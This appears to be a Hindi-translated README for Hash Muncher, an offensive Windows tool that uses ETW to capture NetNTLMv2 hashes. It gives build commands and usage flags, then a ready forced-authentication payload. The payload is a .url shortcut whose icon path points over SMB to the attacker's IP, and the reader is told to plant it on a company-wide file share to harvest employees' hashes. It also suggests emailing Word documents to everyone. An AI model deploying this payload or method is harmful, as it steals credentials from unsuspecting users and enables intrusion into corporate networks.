
Windows 8.1 / Windows Server 2016 और बाद के संस्करणों पर प्रशासनिक अधिकारों के साथ ETW का उपयोग करके NetNTLMv2 हैश प्राप्त करें
Windows पर प्रशासनिक अधिकारों के साथ ETW का उपयोग करके NetNTLMv2 हैश प्राप्त करें
इसे चालू करने के लिए तीन अलग-अलग विकल्प हैं
go install github.com/lkarlslund/hashmuncher@latest
git clone https://github.com/lkarlslund/hashmuncher
cd hashmuncher
./build.ps1
सुनिश्चित करें कि Windows फ़ायरवॉल "File and Printer Sharing" की अनुमति देता है, क्योंकि Hash Muncher को लक्ष्य तक प्रारंभिक अनुरोध भेजने और प्रतिक्रिया पैकेट भेजने के लिए अंतर्निहित SMB सेवा की आवश्यकता होती है।
एक उन्नत प्रॉम्प्ट में Hash Muncher चलाएं
hashmuncher.exe [-output filename.txt] [-timeout nnn] [-tracename yourname] [-help]
[InternetShortcut]
URL=Munch
WorkingDirectory=MunchMunch
IconFile=\\10.1.2.3\%USERNAME%.icon
IconIndex=1
IP पते को अपनी Hach Muncher मशीन से बदलें, और फ़ाइल को (कंपनी-व्यापी) फ़ाइलशेयर में 'whatever.url' के रूप में सहेजें, और हैश आते हुए देखें।
अन्य तरीकों का उल्लेख Red Team Notes - Forced Authentication पर किया गया है, और संभवतः आप सभी को Word दस्तावेज़ ईमेल करके भी सफलता प्राप्त कर सकते हैं, लेकिन यह बिल्कुल भी गुप्त नहीं है।
मैं समय-समय पर ETW के साथ प्रयोग करता रहा हूं, लेकिन जैसे ही मैंने Nettitude Labs का शोध देखा, मुझे पता चल गया कि मुझे इसे अपनी पसंदीदा भाषा Golang में उपयोग में आसान टूल बनाना है! Nettitude Labs के पास .Net फ्रेमवर्क के तहत C# में लिखा गया एक कार्यशील POC है, और यह आपके लिए बेहतर विकल्प हो सकता है। इसलिए मैं यहां वास्तव में कुछ नया आविष्कार नहीं कर रहा हूं, बस इसे एक विकल्प के रूप में जोड़ रहा हूं।
यदि आपको Windows सुरक्षा संबंधी चीजें पसंद हैं, तो आपको मेरा अटैक ग्राफ टूल Adalanche भी पसंद आ सकता है